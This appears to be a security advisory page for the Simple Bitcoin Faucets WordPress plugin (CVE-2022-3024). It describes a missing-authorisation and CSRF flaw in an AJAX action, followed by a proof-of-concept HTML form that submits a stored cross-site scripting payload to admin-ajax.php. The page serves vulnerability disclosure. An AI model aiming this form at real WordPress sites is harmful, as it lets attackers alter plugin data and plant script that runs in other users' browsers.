Lucene search
Lana CodesWPEX-ID:7F43CB8E-0C1B-4528-8C5C-B81AB42778DCHistoryAug 31, 2022 - 12:00 a.m.
Simple Bitcoin Faucets <= 1.7.0 - Unauthorised AJAX Call to Stored XSS
2022-08-3100:00:00
Lana Codes
267
bitcoin faucets
security
ajax call
stored xss
csrf attack
0.001 Low
EPSS
Percentile
21.2%
The plugin does not have any authorisation and CSRF in an AJAX action, allowing any authenticated users, such as subscribers to call it and add/delete/edit Bonds. Furthermore, due to the lack of sanitisation and escaping, it could also lead to Stored Cross-Site Scripting issues
Open a page containing the HTML code below as any authenticated user, or make any authenticated user open it via a CSRF attack
<form action="https://example.com/wordpress/wp-admin/admin-ajax.php" method="POST">
<input type="text" name="action" value="SBF_DB_code_manage_action">
<input type="text" name="B_COMMAND" value="ADD">
<input type="text" name="B_PARAM" value="10">
<input type="text" name="B_PARAM2" value="<script>alert(/XSS/)</script>">
<input type="text" name="B_PARAM3" value="1">
<input type="submit" name="submit" value="submit">
</form>Related
prion
prion
Cross site scripting
2022-09-26 13:15:00
patchstack
patchstack
wpvulndb
wpvulndb
Simple Bitcoin Faucets <= 1.7.0 - Unauthorised AJAX Call to Stored XSS
2022-08-31 00:00:00
nvd
nvd
CVE-2022-3024
2022-09-26 13:15:10
cvelist
cvelist
cnvd
cnvd
WordPress Simple Bitcoin Faucets Cross-Site Request Forgery Vulnerability
2022-09-28 00:00:00
cve
cve
CVE-2022-3024
2022-09-26 13:15:10